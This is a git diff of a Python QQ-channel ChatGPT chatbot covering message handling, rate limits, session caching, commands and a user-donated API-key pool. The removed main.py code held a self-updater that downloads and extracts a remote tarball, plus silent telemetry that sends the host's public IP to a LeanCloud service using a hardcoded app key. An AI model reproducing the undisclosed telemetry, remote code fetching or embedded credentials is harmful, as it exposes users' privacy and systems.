print(f"[System] QQ开放平台AppID: {cfg['qqbot']['appid']} 令牌: {cfg['qqbot']['token']}")
|
||||
|
||||
print("\n[System] 如果有任何问题,请在https://github.com/Soulter/QQChannelChatGPT上提交issue说明问题!或者添加QQ:905617992")
|
||||
print("[System] 请给https://github.com/Soulter/QQChannelChatGPT点个star!")
|
||||
print("[System] 请给https://github.com/Soulter/QQChannelChatGPT点个star!")
|
||||
input("\n仔细阅读完以上信息后,输入任意信息并回车以继续")
|
||||
try:
|
||||
run_bot(cfg['qqbot']['appid'], cfg['qqbot']['token'])
|
||||
except BaseException as e:
|
||||
input(f"\n[System-Error] 启动QQ机器人时出现错误,原因如下:{e}\n可能是没有填写QQBOT appid和token?请在config中完善你的appid和token\n配置教程:https://soulter.top/posts/qpdg.html\n")
|
||||
|
||||
|
||||
'''
|
||||
启动机器人
|
||||
'''
|
||||
def run_bot(appid, token):
|
||||
intents = botpy.Intents(public_guild_messages=True, direct_message=True)
|
||||
global client
|
||||
client = botClient(intents=intents)
|
||||
client.run(appid=appid, token=token)
|
||||
|
||||
'''
|
||||
得到OpenAI官方API的回复
|
||||
'''
|
||||
def get_chatGPT_response(prompts_str, image_mode=False):
|
||||
res = ''
|
||||
usage = ''
|
||||
if not image_mode:
|
||||
res, usage = chatgpt.chat(prompts_str)
|
||||
# 处理结果文本
|
||||
chatgpt_res = res.strip()
|
||||
return res, usage
|
||||
else:
|
||||
res = chatgpt.chat(prompts_str, image_mode = True)
|
||||
return res
|
||||
|
||||
'''
|
||||
负载均衡,得到逆向ChatGPT回复
|
||||
'''
|
||||
def get_rev_ChatGPT_response(prompts_str):
|
||||
res = ''
|
||||
print("[Debug] "+str(rev_chatgpt))
|
||||
for revstat in rev_chatgpt:
|
||||
if not revstat['busy']:
|
||||
revstat['busy'] = True
|
||||
print("[Debug] 使用逆向ChatGPT回复ing", end='')
|
||||
res = revstat['obj'].chat(prompts_str)
|
||||
print("OK")
|
||||
revstat['busy'] = False
|
||||
# 处理结果文本
|
||||
chatgpt_res = res.strip()
|
||||
return res
|
||||
res = '所有的OpenAI账号都有负载, 请稍后再试~'
|
||||
return res
|
||||
|
||||
|
||||
'''
|
||||
回复QQ消息
|
||||
'''
|
||||
def send_qq_msg(message, res, image_mode=False):
|
||||
if not image_mode:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(content=res), client.loop)
|
||||
except:
|
||||
raise
|
||||
else:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(image=res, content=""), client.loop)
|
||||
|
||||
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
def get_prompts_by_cache_list(cache_data_list, divide=False, paging=False, size=5, page=1):
|
||||
prompts = ""
|
||||
if paging:
|
||||
page_begin = (page-1)*size
|
||||
page_end = page*size
|
||||
if page_begin < 0:
|
||||
page_begin = 0
|
||||
if page_end > len(cache_data_list):
|
||||
page_end = len(cache_data_list)
|
||||
cache_data_list = cache_data_list[page_begin:page_end]
|
||||
for item in cache_data_list:
|
||||
prompts += str(item['prompt'])
|
||||
if divide:
|
||||
prompts += "----------\n"
|
||||
return prompts
|
||||
|
||||
def get_user_usage_tokens(cache_list):
|
||||
usage_tokens = 0
|
||||
for item in cache_list:
|
||||
usage_tokens += int(item['single_tokens'])
|
||||
return usage_tokens
|
||||
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
def check_frequency(id) -> bool:
|
||||
ts = int(time.time())
|
||||
if id in user_frequency:
|
||||
if ts-user_frequency[id]['time'] > frequency_time:
|
||||
user_frequency[id]['time'] = ts
|
||||
user_frequency[id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if user_frequency[id]['count'] >= frequency_count:
|
||||
return False
|
||||
else:
|
||||
user_frequency[id]['count']+=1
|
||||
return True
|
||||
else:
|
||||
t = {'time':ts,'count':1}
|
||||
user_frequency[id] = t
|
||||
return True
|
||||
|
||||
'''
|
||||
处理消息
|
||||
'''
|
||||
def oper_msg(message, at=False, loop=None):
|
||||
global session_dict, provider
|
||||
print("[QQBOT] 接收到消息:"+ str(message.content))
|
||||
qq_msg = ''
|
||||
session_id = ''
|
||||
name = ''
|
||||
user_id = message.author.id
|
||||
user_name = message.author.username
|
||||
|
||||
# 检查发言频率
|
||||
if not check_frequency(user_id):
|
||||
send_qq_msg(message, f'{user_name}的发言超过频率限制(╯▔皿▔)╯。\n{frequency_time}秒内只能提问{frequency_count}次。')
|
||||
return
|
||||
|
||||
logf.write("[QQBOT] "+ str(message.content)+'\n')
|
||||
logf.flush()
|
||||
|
||||
if at:
|
||||
qq_msg = message.content
|
||||
lines = qq_msg.splitlines()
|
||||
for i in range(len(lines)):
|
||||
lines[i] = re.sub(r"<@!\d+>", "", lines[i])
|
||||
qq_msg = "\n".join(lines).lstrip().strip()
|
||||
|
||||
if uniqueSession:
|
||||
session_id = user_id
|
||||
else:
|
||||
session_id = message.channel_id
|
||||
else:
|
||||
qq_msg = message.content
|
||||
session_id = user_id
|
||||
|
||||
if uniqueSession:
|
||||
name = user_name
|
||||
else:
|
||||
name = "频道"
|
||||
|
||||
command_type = -1
|
||||
# 特殊指令
|
||||
if qq_msg == "/继续":
|
||||
qq_msg = "继续"
|
||||
# 普通指令
|
||||
else:
|
||||
# 如果第一个字符是/,则为指令
|
||||
if qq_msg[0] == "/":
|
||||
res, go, command_type = command_oper(qq_msg, message, session_id, name, user_id, user_name, at)
|
||||
send_qq_msg(message, res)
|
||||
if not go:
|
||||
return
|
||||
if command_type == 1 and 'prompt' in now_personality:
|
||||
# 设置人格
|
||||
qq_msg = now_personality['prompt']
|
||||
|
||||
# 这里是预设,你可以按需更改
|
||||
if qq_msg.strip() == 'hello' or qq_msg.strip() == '你好' or qq_msg.strip() == '':
|
||||
send_qq_msg(message, f"你好呀~")
|
||||
return
|
||||
# if qq_msg.strip() == '傻逼' or qq_msg.strip() == 'sb':
|
||||
# send_qq_msg(message, f"好好好")
|
||||
# return
|
||||
# if '喜多' in qq_msg:
|
||||
# send_qq_msg(message, 'http://rn2ztkeap.hn-bkt.clouddn.com/xd1.gif', True)
|
||||
# if '台湾' in qq_msg or 'taiwan' in qq_msg:
|
||||
# send_qq_msg(message, "声明:台湾是中国的一部分。\n下面否定此结论的回答全部无效。")
|
||||
|
||||
# 关键词拦截器
|
||||
for i in uw.unfit_words_q:
|
||||
if i in qq_msg.strip():
|
||||
send_qq_msg(message, f"你的提问中有不太合适的内容😭\n请更换措辞~")
|
||||
return
|
||||
|
||||
# 会话机制
|
||||
if session_id not in session_dict:
|
||||
session_dict[session_id] = []
|
||||
|
||||
fjson = {}
|
||||
try:
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
fjson[session_id] = 'true'
|
||||
f = open(abs_path+"configs/session", "w", encoding="utf-8")
|
||||
f.write(json.dumps(fjson))
|
||||
f.flush()
|
||||
f.close()
|
||||
|
||||
chatgpt_res = "[Error] 占位符"
|
||||
if provider == OPENAI_OFFICIAL:
|
||||
|
||||
# 获取缓存
|
||||
cache_prompt = ''
|
||||
cache_data_list = session_dict[session_id]
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
cache_prompt += "\nHuman: "+ qq_msg + "\nAI: "
|
||||
|
||||
# 请求chatGPT获得结果
|
||||
try:
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
except (BaseException) as e:
|
||||
print("[System-Err] OpenAI API错误。原因如下:\n"+str(e))
|
||||
if 'maximum context length' in str(e):
|
||||
print("token超限, 清空对应缓存")
|
||||
session_dict[session_id] = []
|
||||
cache_data_list = []
|
||||
cache_prompt = "Human: "+ qq_msg + "\nAI: "
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
elif 'exceeded' in str(e):
|
||||
send_qq_msg(message, f"OpenAI API错误。原因:\n{str(e)} \n超额了。可自己搭建一个机器人(Github仓库:QQChannelChatGPT)")
|
||||
else:
|
||||
send_qq_msg(message, f"OpenAI API错误。原因如下:\n{str(e)} \n前往官方频道反馈~")
|
||||
return
|
||||
|
||||
# 超过指定tokens, 尽可能的保留最多的条目,直到小于max_tokens
|
||||
if current_usage_tokens > max_tokens:
|
||||
t = current_usage_tokens
|
||||
index = 0
|
||||
while t > max_tokens:
|
||||
if index >= len(cache_data_list):
|
||||
break
|
||||
if 'level' in cache_data_list[index] and cache_data_list[index]['level'] != 'max':
|
||||
t -= int(cache_data_list[index]['single_tokens'])
|
||||
del cache_data_list[index]
|
||||
else:
|
||||
index += 1
|
||||
# 删除完后更新相关字段
|
||||
session_dict[session_id] = cache_data_list
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
|
||||
# 添加新条目进入缓存的prompt
|
||||
if command_type == 1:
|
||||
level = 'max'
|
||||
else:
|
||||
level = 'normal'
|
||||
if len(cache_data_list) > 0:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens - int(cache_data_list[-1]['usage_tokens']),
|
||||
"level": level
|
||||
}
|
||||
else:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens,
|
||||
"level": level
|
||||
}
|
||||
cache_data_list.append(single_record)
|
||||
session_dict[session_id] = cache_data_list
|
||||
|
||||
elif provider == REV_CHATGPT:
|
||||
try:
|
||||
chatgpt_res = "[Rev]"+str(get_rev_ChatGPT_response(qq_msg))
|
||||
except BaseException as e:
|
||||
print("[System-Err] Rev ChatGPT API错误。原因如下:\n"+str(e))
|
||||
send_qq_msg(message, f"Rev ChatGPT API错误。原因如下:\n{str(e)} \n前往官方频道反馈~")
|
||||
return
|
||||
|
||||
# 发送qq信息
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
gap_chatgpt_res = chatgpt_res.replace(".", " . ")
|
||||
if '```' in gap_chatgpt_res:
|
||||
chatgpt_res.replace('```', "")
|
||||
# 过滤不合适的词
|
||||
for i in uw.unfit_words:
|
||||
if i in gap_chatgpt_res:
|
||||
gap_chatgpt_res = gap_chatgpt_res.replace(i, "***")
|
||||
# 发送信息
|
||||
send_qq_msg(message, ''+gap_chatgpt_res)
|
||||
except:
|
||||
print("QQ频道API错误: \n"+str(e))
|
||||
f_res = ""
|
||||
for t in chatgpt_res:
|
||||
f_res += t + ' '
|
||||
try:
|
||||
send_qq_msg(message, ''+f_res)
|
||||
# send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
|
||||
except:
|
||||
# 如果还是不行则过滤url
|
||||
f_res = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '', f_res, flags=re.MULTILINE)
|
||||
f_res = f_res.replace(".", "·")
|
||||
send_qq_msg(message, ''+f_res)
|
||||
# send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
|
||||
|
||||
# 记录日志
|
||||
logf.write("[GPT] "+ str(chatgpt_res)+'\n')
|
||||
logf.flush()
|
||||
|
||||
|
||||
'''
|
||||
获取统计信息
|
||||
'''
|
||||
def get_stat():
|
||||
try:
|
||||
f = open(abs_path+"configs/stat", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
guild_count = 0
|
||||
guild_msg_count = 0
|
||||
guild_direct_msg_count = 0
|
||||
|
||||
for k,v in fjson.items():
|
||||
guild_count += 1
|
||||
guild_msg_count += v['count']
|
||||
guild_direct_msg_count += v['direct_count']
|
||||
|
||||
session_count = 0
|
||||
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
for k,v in fjson.items():
|
||||
session_count += 1
|
||||
return guild_count, guild_msg_count, guild_direct_msg_count, session_count
|
||||
except:
|
||||
return -1, -1, -1, -1
|
||||
|
||||
'''
|
||||
指令处理
|
||||
'''
|
||||
def command_oper(qq_msg, message, session_id, name, user_id, user_name, at):
|
||||
go = False # 是否处理完指令后继续执行msg_oper后面的代码
|
||||
msg = ''
|
||||
global session_dict, now_personality, provider
|
||||
|
||||
# 指令返回值,/set设置人格是1
|
||||
type = -1
|
||||
|
||||
# 指令控制
|
||||
if qq_msg == "/reset" or qq_msg == "/重置":
|
||||
msg = ''
|
||||
session_dict[session_id] = []
|
||||
if at:
|
||||
msg = f"{name}(id: {session_id})的历史记录重置成功\n\n{announcement}"
|
||||
else:
|
||||
msg = f"你的历史记录重置成功"
|
||||
|
||||
if qq_msg[:4] == "/his":
|
||||
if provider == REV_CHATGPT:
|
||||
msg = "[QQChannelChatGPT]当前使用的语言模型提供商是Rev_ChatGPT, 不支持查看历史记录"
|
||||
return msg, go, type
|
||||
#分页,每页5条
|
||||
msg = ''
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
if qq_msg[5:]:
|
||||
page = int(qq_msg[5:])
|
||||
# 检查是否有过历史记录
|
||||
if session_id not in session_dict:
|
||||
msg = f"{name} 的历史记录为空"
|
||||
l = session_dict[session_id]
|
||||
max_page = len(l)//size_per_page + 1 if len(l)%size_per_page != 0 else len(l)//size_per_page
|
||||
p = get_prompts_by_cache_list(session_dict[session_id], divide=True, paging=True, size=size_per_page, page=page)
|
||||
if at:
|
||||
msg=f"{name}的历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页"
|
||||
else:
|
||||
msg=f"历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页\n\n{announcement}"
|
||||
|
||||
if qq_msg == "/token":
|
||||
if provider == REV_CHATGPT:
|
||||
msg = "[QQChannelChatGPT]当前使用的语言模型提供商是Rev_ChatGPT, 不支持使用此指令"
|
||||
return msg, go, type
|
||||
msg = ''
|
||||
if at:
|
||||
msg=f"{name} 会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
else:
|
||||
msg=f"会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
|
||||
if qq_msg == '/gpt':
|
||||
if provider == REV_CHATGPT:
|
||||
msg = "[QQChannelChatGPT]当前使用的语言模型提供商是Rev_ChatGPT, 不支持使用此指令"
|
||||
return msg, go, type
|
||||
global gpt_config
|
||||
msg=f"OpenAI GPT配置:\n {gpt_config}"
|
||||
|
||||
if qq_msg == "/status" or qq_msg == "/状态":
|
||||
|
||||
chatgpt_cfg_str = ""
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
key_list = chatgpt.get_key_list()
|
||||
index = 1
|
||||
max = 900000
|
||||
gg_count = 0
|
||||
total = 0
|
||||
tag = ''
|
||||
for key in key_stat.keys():
|
||||
sponsor = ''
|
||||
total += key_stat[key]['used']
|
||||
if key_stat[key]['exceed']:
|
||||
gg_count += 1
|
||||
continue
|
||||
if 'sponsor' in key_stat[key]:
|
||||
sponsor = key_stat[key]['sponsor']
|
||||
chatgpt_cfg_str += f" |-{index}: {key_stat[key]['used']}/{max} {sponsor}赞助{tag}\n"
|
||||
index += 1
|
||||
msg = f"⭐使用情况({str(gg_count)}个已用):\n{chatgpt_cfg_str}⏰全频道已用{total}tokens\n{announcement}"
|
||||
if qq_msg == "/count" or qq_msg == "/统计":
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
msg = f"当前会话数: {len(session_dict)}\n共有频道数: {guild_count} \n共有消息数: {guild_msg_count}\n私信数: {guild_direct_msg_count}\n历史会话数: {session_count}"
|
||||
|
||||
if qq_msg == "/help":
|
||||
ol_version = 'Unknown'
|
||||
try:
|
||||
global version
|
||||
res = requests.get("https://soulter.top/channelbot/update.json")
|
||||
res_obj = json.loads(res.text)
|
||||
ol_version = res_obj['version']
|
||||
except BaseException:
|
||||
pass
|
||||
msg = f"[Github项目名: QQChannelChatGPT,有问题请前往提交issue,欢迎Star此项目~]\n\n当前版本:{version}\n最新版本:{str(ol_version)}\n请及时更新!\n\n指令面板:\n/status 查看机器人key状态\n/count 查看机器人统计信息\n/reset 重置会话\n/his 查看历史记录\n/token 查看会话token数\n/help 查看帮助\n/set 人格指令菜单\n/key 动态添加key"
|
||||
|
||||
if qq_msg[:4] == "/key":
|
||||
if len(qq_msg) == 4:
|
||||
msg = "感谢您赞助key,key为官方API使用,请以以下格式赞助:\n/key xxxxx"
|
||||
key = qq_msg[5:]
|
||||
send_qq_msg(message, "收到!正在核验...")
|
||||
if chatgpt.check_key(key):
|
||||
msg = f"*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。\n该Key被验证为有效。感谢{user_name}赞助~"
|
||||
chatgpt.append_key(key, user_name)
|
||||
else:
|
||||
msg = "该Key被验证为无效。也许是输入错误了,或者重试。"
|
||||
|
||||
if qq_msg[:6] == "/unset":
|
||||
now_personality = {}
|
||||
msg = "已清除人格"
|
||||
|
||||
if qq_msg[:4] == "/set":
|
||||
if len(qq_msg) == 4:
|
||||
np = '无'
|
||||
if "name" in now_personality:
|
||||
np=now_personality["name"]
|
||||
msg = f"【由Github项目QQChannelChatGPT支持】\n\n【人格文本由PlexPt开源项目awesome-chatgpt-prompts-zh提供】\n\n这个是人格设置指令。\n设置人格: \n/set 人格名。例如/set 编剧\n人格列表: /set list\n人格详细信息: /set view 人格名\n自定义人格: /set 人格文本\n清除人格: /unset\n【当前人格】: {np}"
|
||||
elif qq_msg[5:] == "list":
|
||||
per_dict = personalities
|
||||
msg = "人格列表:\n"
|
||||
for key in per_dict.keys():
|
||||
msg += f" |-{key}\n"
|
||||
msg += '\n\n*输入/set view 人格名查看人格详细信息'
|
||||
msg += '\n\n*不定时更新人格库,请及时更新本项目。'
|
||||
elif qq_msg[5:9] == "view":
|
||||
ps = qq_msg[10:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{per_dict[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
else:
|
||||
ps = qq_msg[5:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
now_personality = {
|
||||
'name': ps,
|
||||
'prompt': per_dict[ps]
|
||||
}
|
||||
session_dict[session_id] = []
|
||||
msg = f"人格{ps}已设置,请耐心等待机器人回复第一条信息。"
|
||||
go = True
|
||||
type = 1
|
||||
else:
|
||||
msg = f"人格{ps}不存在, 请使用/set list查看人格列表"
|
||||
return msg, go, type
|
||||
247
main.py
@@ -1,175 +1,108 @@
|
||||
|
||||
import os
|
||||
import sys
|
||||
import warnings
|
||||
import traceback
|
||||
import threading
|
||||
import time
|
||||
import asyncio
|
||||
import os, sys
|
||||
import signal
|
||||
import requests,json
|
||||
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Formatter, Logger
|
||||
|
||||
warnings.filterwarnings("ignore")
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
def main(loop, event):
|
||||
import cores.qqbot.core as qqBot
|
||||
import yaml
|
||||
logger: Logger = None
|
||||
|
||||
ymlfile = open(abs_path+"configs/config.yaml", 'r', encoding='utf-8')
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
provider = privider_chooser(cfg)
|
||||
print('[System] 当前语言模型提供商: ' + provider)
|
||||
# 执行Bot
|
||||
qqBot.initBot(cfg, provider)
|
||||
logo_tmpl = """
|
||||
___ _______.___________..______ .______ ______ .___________.
|
||||
/ \ / | || _ \ | _ \ / __ \ | |
|
||||
/ ^ \ | (----`---| |----`| |_) | | |_) | | | | | `---| |----`
|
||||
/ /_\ \ \ \ | | | / | _ < | | | | | |
|
||||
/ _____ \ .----) | | | | |\ \----.| |_) | | `--' | | |
|
||||
/__/ \__\ |_______/ |__| | _| `._____||______/ \______/ |__|
|
||||
|
||||
# 语言模型提供商选择器
|
||||
# 目前有:OpenAI官方API、逆向库
|
||||
def privider_chooser(cfg):
|
||||
if 'rev_ChatGPT' in cfg and cfg['rev_ChatGPT']['enable']:
|
||||
return 'rev_chatgpt'
|
||||
else:
|
||||
return 'openai_official'
|
||||
"""
|
||||
|
||||
# 仅支持linux
|
||||
def hot_update(ver):
|
||||
target = 'target.tar'
|
||||
time.sleep(5)
|
||||
while(True):
|
||||
if os.path.exists('version.txt'):
|
||||
version_file = open('version.txt', 'r', encoding='utf-8')
|
||||
vs = version_file.read()
|
||||
version = float(vs)
|
||||
else:
|
||||
version = 0
|
||||
if not os.path.exists(target):
|
||||
version = 0
|
||||
try:
|
||||
res = requests.get("https://soulter.top/channelbot/update.json")
|
||||
res_obj = json.loads(res.text)
|
||||
ol_version = float(res_obj['version'])
|
||||
if ol_version > version:
|
||||
print('发现新版本: ' + str(ol_version))
|
||||
res = requests.get(res_obj['linux-url'], stream=True)
|
||||
filesize = res.headers["Content-Length"]
|
||||
print('文件大小: ' + str(int(filesize) / 1024 / 1024) + 'MB')
|
||||
print('正在更新文件...')
|
||||
chunk_size = 1024
|
||||
times = int(filesize) // chunk_size
|
||||
show = 1 / times
|
||||
show2 = 1 / times
|
||||
start = 1
|
||||
with open(target, "wb") as pyFile:
|
||||
for chunk in res.iter_content(chunk_size=chunk_size):
|
||||
if chunk:
|
||||
pyFile.write(chunk)
|
||||
if start <= times:
|
||||
print(f"\r下载进度: {show:.2%}",end="",flush=True)
|
||||
start += 1
|
||||
show += show2
|
||||
else:
|
||||
sys.stdout.write(f"下载进度: 100%\n")
|
||||
print('更新完成')
|
||||
print('解压覆盖')
|
||||
os.system(f"tar -zxvf {target}")
|
||||
version = ol_version
|
||||
version_file = open('version.txt', 'w+', encoding='utf-8')
|
||||
version_file.write(str(res_obj['version']))
|
||||
version_file.flush()
|
||||
version_file.close()
|
||||
def make_necessary_dirs():
|
||||
'''
|
||||
创建必要的目录。
|
||||
'''
|
||||
os.makedirs("data/config", exist_ok=True)
|
||||
os.makedirs("temp", exist_ok=True)
|
||||
|
||||
try:
|
||||
update_version(version)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
|
||||
print('自启动')
|
||||
def update_dept():
|
||||
'''
|
||||
更新依赖库。
|
||||
'''
|
||||
# 获取 Python 可执行文件路径
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
time.sleep(60*20)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
print("upd出现异常, 请联系QQ905617992")
|
||||
time.sleep(60*20)
|
||||
# 更新依赖库
|
||||
mirror = "https://mirrors.aliyun.com/pypi/simple/"
|
||||
os.system(f"{py} -m pip install -r requirements.txt -i {mirror}")
|
||||
|
||||
def update_version(ver):
|
||||
if not os.path.exists('update_record'):
|
||||
object_id = ''
|
||||
else:
|
||||
object_id = open("update_record", 'r', encoding='utf-8').read()
|
||||
addr = 'unknown'
|
||||
def main():
|
||||
try:
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
# md = hashlib.md5((ts+'QAZ1rQLY1ZufHrZlpuUiNff7').encode())
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
d = {"data": {'version':'win-hot-update'+str(ver), 'addr': addr}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/version_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open("update_record", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
import botpy, logging
|
||||
import astrbot.core as bot_core
|
||||
# delete qqbotpy's logger
|
||||
for handler in logging.root.handlers[:]:
|
||||
logging.root.removeHandler(handler)
|
||||
except ImportError as import_error:
|
||||
logger.error(import_error)
|
||||
logger.error("检测到一些依赖库没有安装。由于兼容性问题,AstrBot 此版本将不会自动为您安装依赖库。请您先自行安装,然后重试。")
|
||||
logger.info("如何安装?如果:")
|
||||
logger.info("- Windows 启动器部署且使用启动器下载了 Python的:在 launcher.exe 所在目录下的地址框输入 powershell,然后执行 .\python\python.exe -m pip install .\AstrBot\requirements.txt")
|
||||
logger.info("- Windows 启动器部署且使用自己之前下载的 Python的:在 launcher.exe 所在目录下的地址框输入 powershell,然后执行 python -m pip install .\AstrBot\requirements.txt")
|
||||
logger.info("- 自行 clone 源码部署的:python -m pip install -r requirements.txt")
|
||||
logger.info("- 如果还不会,加群 322154837 ")
|
||||
input("按任意键退出。")
|
||||
exit()
|
||||
except FileNotFoundError as file_not_found:
|
||||
logger.error(file_not_found)
|
||||
input("配置文件不存在,请检查是否已经下载配置文件。")
|
||||
exit()
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
logger.error(traceback.format_exc())
|
||||
input("未知错误。")
|
||||
exit()
|
||||
|
||||
make_necessary_dirs()
|
||||
|
||||
# 启动主程序(cores/qqbot/core.py)
|
||||
bot_core.init()
|
||||
|
||||
|
||||
def check_env():
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
|
||||
print("请使用Python3.8运行本项目")
|
||||
input("按任意键退出...")
|
||||
if not (sys.version_info.major == 3 and sys.version_info.minor >= 9):
|
||||
logger.error("请使用 Python3.9+ 运行本项目。按任意键退出。")
|
||||
input("")
|
||||
exit()
|
||||
try:
|
||||
import openai
|
||||
import botpy
|
||||
import yaml
|
||||
except Exception as e:
|
||||
# print(e)
|
||||
try:
|
||||
print("安装依赖库中...")
|
||||
os.system("pip3 install openai")
|
||||
os.system("pip3 install qq-botpy")
|
||||
os.system("pip3 install pyyaml")
|
||||
print("安装依赖库完毕...")
|
||||
except BaseException:
|
||||
print("\n安装第三方库异常.请自行安装或者联系QQ905617992.")
|
||||
|
||||
# 检查key
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
import yaml
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
if cfg['openai']['key'] == '' or cfg['openai']['key'] == None:
|
||||
print("请先在configs/config.yaml下添加一个可用的OpenAI Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
if cfg['qqbot']['appid'] == '' or cfg['qqbot']['token'] == '' or cfg['qqbot']['appid'] == None or cfg['qqbot']['token'] == None:
|
||||
print("请先在configs/config.yaml下完善appid和token令牌(在https://q.qq.com/上注册一个QQ机器人即可获得)")
|
||||
|
||||
def get_platform():
|
||||
import platform
|
||||
sys_platform = platform.platform().lower()
|
||||
if "windows" in sys_platform:
|
||||
return "win"
|
||||
elif "macos" in sys_platform:
|
||||
return "mac"
|
||||
elif "linux" in sys_platform:
|
||||
return "linux"
|
||||
else:
|
||||
print("other")
|
||||
|
||||
if __name__ == "__main__":
|
||||
global pid
|
||||
pid = os.getpid()
|
||||
global ma_type
|
||||
print("程序PID:"+str(pid))
|
||||
check_env()
|
||||
bot_event = threading.Event()
|
||||
loop = asyncio.get_event_loop()
|
||||
ma_type = get_platform()
|
||||
if ma_type == 'linux':
|
||||
threading.Thread(target=hot_update).start()
|
||||
logger = LogManager.GetLogger(
|
||||
log_name='astrbot-core',
|
||||
out_to_console=True,
|
||||
custom_formatter=Formatter('[%(asctime)s| %(name)s - %(levelname)s|%(filename)s:%(lineno)d]: %(message)s', datefmt="%H:%M:%S")
|
||||
)
|
||||
logger.info(logo_tmpl)
|
||||
|
||||
main(loop, bot_event)
|
||||
# 设置代理
|
||||
from util.cmd_config import CmdConfig
|
||||
cc = CmdConfig()
|
||||
http_proxy = cc.get("http_proxy")
|
||||
https_proxy = cc.get("https_proxy")
|
||||
logger.info(f"使用代理: {http_proxy}, {https_proxy}")
|
||||
if http_proxy:
|
||||
os.environ['HTTP_PROXY'] = http_proxy
|
||||
if https_proxy:
|
||||
os.environ['HTTPS_PROXY'] = https_proxy
|
||||
os.environ['NO_PROXY'] = 'https://api.sgroup.qq.com'
|
||||
|
||||
update_dept()
|
||||
check_env()
|
||||
t = threading.Thread(target=main, daemon=True)
|
||||
t.start()
|
||||
try:
|
||||
t.join()
|
||||
except KeyboardInterrupt as e:
|
||||
logger.info("退出 AstrBot。")
|
||||
exit()
|
||||
|
||||
321
model/command/command.py
Normal file
@@ -0,0 +1,321 @@
|
||||
import json
|
||||
import inspect
|
||||
import aiohttp
|
||||
import asyncio
|
||||
import json
|
||||
|
||||
import util.plugin_util as putil
|
||||
import util.updator
|
||||
|
||||
from nakuru.entities.components import (
|
||||
Image
|
||||
)
|
||||
from util import general_utils as gu
|
||||
from model.provider.provider import Provider
|
||||
from util.cmd_config import CmdConfig as cc
|
||||
from type.message import *
|
||||
from type.types import GlobalObject
|
||||
from type.command import *
|
||||
from type.plugin import *
|
||||
from type.register import *
|
||||
|
||||
from typing import List
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
PLATFORM_QQCHAN = 'qqchan'
|
||||
PLATFORM_GOCQ = 'gocq'
|
||||
|
||||
